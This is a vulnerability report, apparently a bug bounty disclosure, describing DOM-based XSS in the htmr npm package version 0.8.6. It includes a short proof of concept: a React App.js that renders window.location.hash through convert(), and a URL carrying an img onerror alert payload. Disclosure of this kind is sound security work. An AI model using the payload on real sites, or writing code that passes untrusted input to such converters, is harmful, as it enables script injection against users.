Hi,
I would like to report DOM-based XSS in htmr.
It allows attackers to insert malicious JavaScript payload into the page.
module name: htmrversion:0.8.6npm page: https://www.npmjs.com/package/htmr
Simple and lightweight (< 2kB) HTML string to react element conversion library
[6,877] weekly downloads
This module uses innerHTML
ref to unescape HTML entities. This leads to DOM-based XSS by inserting HTML-encoded XSS payload (see PoC).
create-react-app xss-htmr
htmr
module: cd xss-htmr; npm i htmr
src/App.js
file to this:import React from 'react';
import convert from 'htmr';
export default function App() {
return convert(`<p>Hash: ${window.location.hash}</p>`);
}
npm run start
http://localhost:3000/#<img/src/onerror=alert('xss')>
, an alert will popup.{F653977}
Thank you and regards,
Visat
DOM-based XSS